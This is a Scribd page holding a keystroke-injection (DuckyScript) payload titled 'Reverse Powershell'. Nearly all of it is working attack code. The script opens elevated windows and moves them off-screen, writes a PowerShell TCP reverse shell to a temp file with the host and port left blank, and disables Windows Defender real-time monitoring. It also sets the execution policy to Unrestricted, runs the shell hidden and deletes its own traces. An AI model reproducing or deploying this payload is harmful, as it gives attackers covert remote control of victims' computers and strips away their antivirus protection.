Scribd
Upload
36 views2 pages

Reverse Powershell

Uploaded by

arturo juan perez
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
36 views2 pages

Reverse Powershell

Uploaded by

arturo juan perez
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)

REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.


REM Version: 1.0
REM Category: Remote_Access
DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object
System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|
%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );
$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby =
([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};
$c.Close()’
ENTER
DELAY 750
STRING Set-MpPreference -DisableRealtimeMonitoring $true
DELAY 500
ENTER
DELAY 750
STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 1000
STRING C:\Windows\config-34593.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:
$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
ENTER

You might also like